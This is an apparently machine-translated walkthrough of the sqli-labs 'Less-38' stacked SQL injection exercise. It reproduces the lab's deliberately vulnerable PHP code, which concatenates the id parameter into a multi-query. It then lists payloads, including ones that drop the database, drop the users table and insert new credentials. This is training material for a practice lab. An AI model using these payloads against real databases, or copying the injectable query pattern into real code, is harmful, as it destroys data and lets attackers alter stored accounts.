SQL injection less38 (Stack Injection)

<?php
if(isset($_GET['id']))
{
    
$id=$_GET['id'];

// connectivity
//mysql connections for stacked query examples.
$con1 = mysqli_connect($host,$dbuser,$dbpass,$dbname);
// Check connection
if (mysqli_connect_errno($con1))
{
    
    echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
else
{
    
    @mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database: $dbname");
}



$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
{
    
    
    /* store first result set */
    if ($result = mysqli_store_result($con1))
    {
    
        if($row = mysqli_fetch_row($result))
        {
    
            echo '<font size = "5" color= "#00FF00">';	
            printf("Your Username is : %s", $row[1]);
            echo "<br>";
            printf("Your Password is : %s", $row[2]);
            echo "<br>";
            echo "</font>";
        }
// mysqli_free_result($result);
    }
        /* print divider */
    if (mysqli_more_results($con1))
    {
    
            //printf("-----------------\n");
    }
     //while (mysqli_next_result($con1));
}
else 
    {
    
	echo '<font size="5" color= "#FFFF00">';
	print_r(mysqli_error($con1));
	echo "</font>";  
    }
/* close connection */
mysqli_close($con1);


}
	else {
     echo "Please input the ID as parameter with numeric value";}

?>

mysqli_multi_query() Function to execute one or more queries against the database . Multiple queries are separated by semicolons
mysqli_store_result() Transfer the result set returned by the last query
mysqli_fetch_row() Function takes a line from the result set , And return... As an enumerated array .

So only the results of the first query are displayed , Do not display the following query results .

Look at this question again , You can talk to Less1 equally , use union Inject , It can be used to query data .

Here I try a few with Stack Injection payload
?id=1';1=1
?id=1';1=2
?id=1';nihao
?id=1';nihao'

All the results are like this

So the page only shows the result of the first query . The following queries are irrelevant .

So we can't find the data with Stack Injection , however insert data , Delete data , Update data , Modify the name of the table 、 Database name and other things are ok
?id=1';drop database security;
?id=1';drop table users;
?id=1';insert into users(username,password) values('happy','coder');